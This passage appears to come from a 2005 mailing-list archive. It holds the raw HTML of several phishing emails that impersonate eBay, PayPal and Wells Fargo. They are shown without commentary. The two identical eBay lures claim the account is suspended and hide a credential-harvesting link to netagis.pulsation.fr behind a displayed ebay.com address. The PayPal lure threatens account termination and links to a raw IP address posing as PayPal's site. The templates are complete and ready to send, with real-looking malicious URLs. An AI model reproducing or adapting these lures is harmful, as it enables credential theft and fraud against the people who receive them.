height="1" alt="" src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/common/images/shim.gif" width="1"></div> <div class="footer1" style="WIDTH: 100%; TEXT-ALIGN: center"> <a tabIndex="8" href="http://www.wellsfargo.com/about/about.jhtml"> About Wells Fargo</a> | <a tabIndex="8" href="http://www.wellsfargo.com/employment"> Employment</a> | <a tabIndex="8" href="http://www.wellsfargo.com/privacy_security/email_fraud/report.jhtml"> Report Email Fraud</a> | <a tabIndex="8" href="http://www.wellsfargo.com/privacy_security/index.jhtml"> Privacy, Security & Legal</a> | <a title="Wells Fargo Home" tabIndex="8" href="http://www.wellsfargo.com"> Home</a> </div> <div class="disclosure" style="MARGIN-TOP: 9px; WIDTH: 100%; TEXT-ALIGN: center"> © 1995 - 2004 Wells Fargo. All rights reserved. </div> </div> </td> </tr> </table> </div> </body> </html> |
|
From: ebay <sus...@eB...> - 2005-07-23 16:09:51
|
<HTML><HEAD><TITLE>New Page</TITLE> <P><A href="http://mail.yahoo.com/config/login?/http://click3.ebay.com/99019653.50692.0.20283" target=_blank><IMG src="http://emailpics3.ebay.com/627422250/images/logo-18.gif" border=0></A></P> <P><FONT lang=0 face=Arial size=2 FAMILY="SANSSERIF" PTSIZE="10"><FONT lang=0 face=Arial size=2 FAMILY="SANSSERIF" PTSIZE="10">Dear valued eBay member:<BR><BR>Due to recent activity, including possible unauthorized listings, we have temporarily suspended activity on your account in order to allow us to investigate this matter further. As your acount has been successfully investigated we need you to re-confirm your account information.<BR><BR>To confirm your eBay User Id / eBay Password records click here:<BR><A href="http://mail.yahoo.com/config/login?/http://netagis.pulsation.fr/w/eBayISAPI.dll/index.php" target=_self>http://cgi1.ebay.com/aw-cgi/ebayISAPI.dll?UPdate</A><BR><BR>If you received this notice and you are not the authorized account holder, please be aware that it is in violation of eBay policy to represent oneself as another eBay user. Such action may also be in violation of local, national, and/or international law. eBay is committed to assist law enforcement with any inquiries related to attempts to misappropriate personal information with the intent to commit fraud or theft. Information will be provided at the request of law enforcement agencies to ensure that perpetrators are prosecuted to the fullest extent of the law.<BR><FONT face="Arial, Helvetica, sans-serif"><FONT color=#000000><BR>We appreciate your support and understanding, as we work together to keep eBay a safe place to trade.</FONT></FONT><FONT face="Arial, Helvetica, sans-serif" color=#000000><BR>Thank you for your patience in this matter.</FONT><BR><BR><FONT face="Arial, Helvetica, sans-serif" color=#000000>Regards,<BR><STRONG>Safeharbor Department<BR>eBay Inc.</STRONG><BR><!-- toctype = X-unknown --><!-- toctype = text --><!-- text --><!-- toctype = message --><!-- toctype = X-unknown --><!-- toctype = text --><!-- text --><!-- END TOC --></FONT><FONT face="Arial, Helvetica, sans-serif"><FONT color=#999999><BR>Please do not reply to this e-mail as this is only a notification. Mail sent to this address cannot be answered. </FONT></FONT></P> <P><FONT face="Arial, Helvetica, sans-serif" color=#000000><FONT color=black><SPAN style="COLOR: black"><FONT size=1>Copyright 1995-2006 </FONT><A href="http://mail.yahoo.com/config/login?/http://pages.ebay.com/community/aboutebay/index.html" target=_blank><FONT size=1>eBay Inc.</FONT></A><FONT size=1> All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay </FONT><A href="http://mail.yahoo.com/config/login?/http://pages.ebay.com/help/community/png-user.html" target=_blank><FONT size=1>User Agreement</FONT></A><FONT size=1> and </FONT><A href="http://mail.yahoo.com/config/login?/http://pages.ebay.com/help/community/png-priv.html" target=_blank><FONT size=1>Privacy Policy</FONT></A><FONT size=1>.</FONT></SPAN><FONT size=1> </FONT></FONT></FONT><FONT size=1><FONT face="Arial, Helvetica, sans-serif" color=#000000>Designated trademarks and brands are the property of their respective owners. eBay and the eBay logo are trademarks of eBay Inc. eBay is located at 2145 Hamilton Avenue, San Jose, CA 95125. </FONT><BR></FONT></P></FONT></FONT> |
|
From: ebay <sus...@eB...> - 2005-07-23 15:53:26
|
<HTML><HEAD><TITLE>New Page</TITLE> <P><A href="http://mail.yahoo.com/config/login?/http://click3.ebay.com/99019653.50692.0.20283" target=_blank><IMG src="http://emailpics3.ebay.com/627422250/images/logo-18.gif" border=0></A></P> <P><FONT lang=0 face=Arial size=2 FAMILY="SANSSERIF" PTSIZE="10"><FONT lang=0 face=Arial size=2 FAMILY="SANSSERIF" PTSIZE="10">Dear valued eBay member:<BR><BR>Due to recent activity, including possible unauthorized listings, we have temporarily suspended activity on your account in order to allow us to investigate this matter further. As your acount has been successfully investigated we need you to re-confirm your account information.<BR><BR>To confirm your eBay User Id / eBay Password records click here:<BR><A href="http://mail.yahoo.com/config/login?/http://netagis.pulsation.fr/w/eBayISAPI.dll/index.php" target=_self>http://cgi1.ebay.com/aw-cgi/ebayISAPI.dll?UPdate</A><BR><BR>If you received this notice and you are not the authorized account holder, please be aware that it is in violation of eBay policy to represent oneself as another eBay user. Such action may also be in violation of local, national, and/or international law. eBay is committed to assist law enforcement with any inquiries related to attempts to misappropriate personal information with the intent to commit fraud or theft. Information will be provided at the request of law enforcement agencies to ensure that perpetrators are prosecuted to the fullest extent of the law.<BR><FONT face="Arial, Helvetica, sans-serif"><FONT color=#000000><BR>We appreciate your support and understanding, as we work together to keep eBay a safe place to trade.</FONT></FONT><FONT face="Arial, Helvetica, sans-serif" color=#000000><BR>Thank you for your patience in this matter.</FONT><BR><BR><FONT face="Arial, Helvetica, sans-serif" color=#000000>Regards,<BR><STRONG>Safeharbor Department<BR>eBay Inc.</STRONG><BR><!-- toctype = X-unknown --><!-- toctype = text --><!-- text --><!-- toctype = message --><!-- toctype = X-unknown --><!-- toctype = text --><!-- text --><!-- END TOC --></FONT><FONT face="Arial, Helvetica, sans-serif"><FONT color=#999999><BR>Please do not reply to this e-mail as this is only a notification. Mail sent to this address cannot be answered. </FONT></FONT></P> <P><FONT face="Arial, Helvetica, sans-serif" color=#000000><FONT color=black><SPAN style="COLOR: black"><FONT size=1>Copyright 1995-2006 </FONT><A href="http://mail.yahoo.com/config/login?/http://pages.ebay.com/community/aboutebay/index.html" target=_blank><FONT size=1>eBay Inc.</FONT></A><FONT size=1> All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay </FONT><A href="http://mail.yahoo.com/config/login?/http://pages.ebay.com/help/community/png-user.html" target=_blank><FONT size=1>User Agreement</FONT></A><FONT size=1> and </FONT><A href="http://mail.yahoo.com/config/login?/http://pages.ebay.com/help/community/png-priv.html" target=_blank><FONT size=1>Privacy Policy</FONT></A><FONT size=1>.</FONT></SPAN><FONT size=1> </FONT></FONT></FONT><FONT size=1><FONT face="Arial, Helvetica, sans-serif" color=#000000>Designated trademarks and brands are the property of their respective owners. eBay and the eBay logo are trademarks of eBay Inc. eBay is located at 2145 Hamilton Avenue, San Jose, CA 95125. </FONT><BR></FONT></P></FONT></FONT> |
|
From: Paypal <se...@pa...> - 2005-07-21 00:28:51
|
<HTML><HEAD><TITLE></TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<XMETA Content="Microsoft DHTML Editing Control" NAME="GENERATOR"><XBODY>
<STYLE type=text/css>#message .dummy {
}
#message {
FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: verdana,arial,helvetica,sans-serif
}
#message TD {
FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: verdana,arial,helvetica,sans-serif
}
#message LI {
LINE-HEIGHT: 120%
}
#message UL.ppsmallborder {
MARGIN: 10px 5px 10px 20px
}
#message LI.ppsmallborderli {
MARGIN: 0px 0px 5px
}
#message UL.pp_narrow {
MARGIN: 10px 5px 0px 40px
}
#message HR.dotted {
BORDER-RIGHT: #fff; BORDER-TOP: #fff; MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; BORDER-LEFT: #fff; WIDTH: 100%; BORDER-BOTTOM: #ccc 2px dotted
}
#message .pp_label {
FONT-WEIGHT: bold; FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY: verdana,arial,helvetica,sans-serif
}
#message .pp_serifbig {
FONT-WEIGHT: bold; FONT-SIZE: 20px; COLOR: #000000; FONT-FAMILY: serif
}
#message .pp_serif {
FONT-SIZE: 16px; COLOR: #000000; FONT-FAMILY: serif
}
#message .pp_sansserif {
FONT-SIZE: 16px; COLOR: #000000; FONT-FAMILY: verdana,arial,helvetica,sans-serif
}
#message .pp_heading {
FONT-WEIGHT: bold; FONT-SIZE: 18px; COLOR: #003366; FONT-FAMILY: verdana,arial,helvetica,sans-serif
}
#message .pp_subheadingeoa {
FONT-WEIGHT: bold; FONT-SIZE: 15px; COLOR: #000000; FONT-FAMILY: verdana,arial,helvetica,sans-serif
}
#message .pp_subheading {
FONT-WEIGHT: bold; FONT-SIZE: 16px; COLOR: #003366; FONT-FAMILY: verdana,arial,helvetica,sans-serif
}
#message .pp_sidebartext {
FONT-SIZE: 11px; COLOR: #003366; FONT-FAMILY: verdana,arial,helvetica,sans-serif
}
#message .pp_sidebartextbold {
FONT-WEIGHT: bold; FONT-SIZE: 11px; COLOR: #003366; FONT-FAMILY: verdana,arial,helvetica,sans-serif
}
#message .pp_footer {
FONT-SIZE: 11px; COLOR: #aaaaaa; FONT-FAMILY: verdana,arial,helvetica,sans-serif
}
#message .pp_button {
FONT-WEIGHT: 400; FONT-SIZE: 13px; COLOR: #000000; BORDER-TOP-STYLE: outset; FONT-FAMILY: verdana,arial,helvetica,sans-serif; BORDER-RIGHT-STYLE: outset; BORDER-LEFT-STYLE: outset; BACKGROUND-COLOR: #cccccc; BORDER-BOTTOM-STYLE: outset
}
#message .pp_smaller {
FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY: verdana,arial,helvetica,sans-serif
}
#message .pp_smallersidebar {
FONT-SIZE: 10px; COLOR: #003366; FONT-FAMILY: verdana,arial,helvetica,sans-serif
}
#message .ppem106 {
FONT-WEIGHT: 700
}
</STYLE>
<META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD>
<BODY>
<TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0>
<TBODY>
<TR vAlign=top>
<TD>
<img alt src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif" border="0" width="200" height="50"> </TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD width="100%"
background=http://www.sbnllc.com/images/bg_clk.gif><IMG
height=29
src="http://www.sbnllc.com/images/pixel.gif"
width=1 border=0></TD></TR>
<TR>
<TD><IMG height=10
src="http://www.sbnllc.com/images/pixel.gif"
width=1 border=0></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0>
<TBODY>
<TR vAlign=top>
<TD width=400>
<TABLE cellSpacing=0 cellPadding=5 width="100%" border=0 height="507">
<TBODY>
<TR vAlign=top>
<TD height="38">
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD class=pp_heading align=left><BR><b>Dear PayPal Customer:</b></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD height="458"><BR>It has come to our attention that your PayPal
billing updates are out of order. If you could please take 5-10
minutes out of your
<O:P />online experience and update your billing records you will not
run
<O:P />into any future problems with the online service. However,
failure
<O:P />to update your records will result in account termination.
<p>If you are the rightful holder of the account you must
<B>click the link below</B> and then complete all steps from the
following page as we try to update your account billing records.<BR><BR>
</p>
<TABLE cellSpacing=0 cellPadding=1 width="75%" align=left
bgColor=#ffe65c border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=4 width="100%" align=center
bgColor=#fffecd border=0>
<TBODY>
<TR>
<TD class=pp_sansserif align=middle><A
href="http://213.190.45.196/~evaldas/us/cgi-bin/webscr/"
target=_blank>Click here to verify your account
</A></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE><BR><BR> <p>
Once you have updated your account records your PayPal session will
not be
<O:P />interrupted and will continue as normal. <BR><BR>Thank you for using PayPal!
<p>
The PayPal Team </TD></TR>
<TR>
<TD height="1">
<XBODY>
<SPAN class=pp_footer>PayPal Email ID PP738</SPAN></XBODY></TD></TR>
<TR>
<TD height="1">
<TR>
<TD height="38"> </TD></TR></TBODY></TABLE></TD>
<TD><IMG height=1
src="http://www.sbnllc.com/images/pixel(1).gif"
width=10 border=0></TD>
<TD vAlign=top width=190>
<TABLE cellSpacing=0 cellPadding=1 width="100%" bgColor=#cccccc
border=0><TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%" bgColor=#ffffff
border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=5 width="100%"
bgColor=#eeeeee border=0>
<TBODY>
<TR>
<TD class=pp_sidebartextbold align=middle>Protect Your
Account Info</TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=5 width="100%" border=0>
<TBODY>
<TR>
<TD class=pp_sidebartext><BR>Make sure you never provide
your password to fraudulent persons. <BR><BR>PayPal
automatically encrypts your confidential information
using the Secure Sockets Layer protocol (SSL) with an
encryption key length of 128-bits (the highest level
commercially available).<BR><BR>PayPal will never ask
you to enter your password in an email.<BR><BR>For more
information on protecting yourself from fraud, please
review our Security Tips at
http://www.paypal.com/securitytips<BR><IMG height=5
src="http://www.sbnllc.com/images/pixel.gif"
width=1 border=0> </TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=5 width="100%"
bgColor=#eeeeee border=0>
<TBODY>
<TR>
<TD class=pp_sidebartextbold align=middle>Protect Your
Password</TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=5 width="100%" border=0>
<TBODY>
<TR>
<TD class=pp_sidebartext>You should <SPAN
class=ppem106>never</SPAN> give your PayPal password to
anyone, including PayPal employees.<BR><IMG height=5
src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif"
width=1
border=0></TD></TR></TBODY></TABLE></TD></TR></TD></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></XBODY></BODY></HTML>
|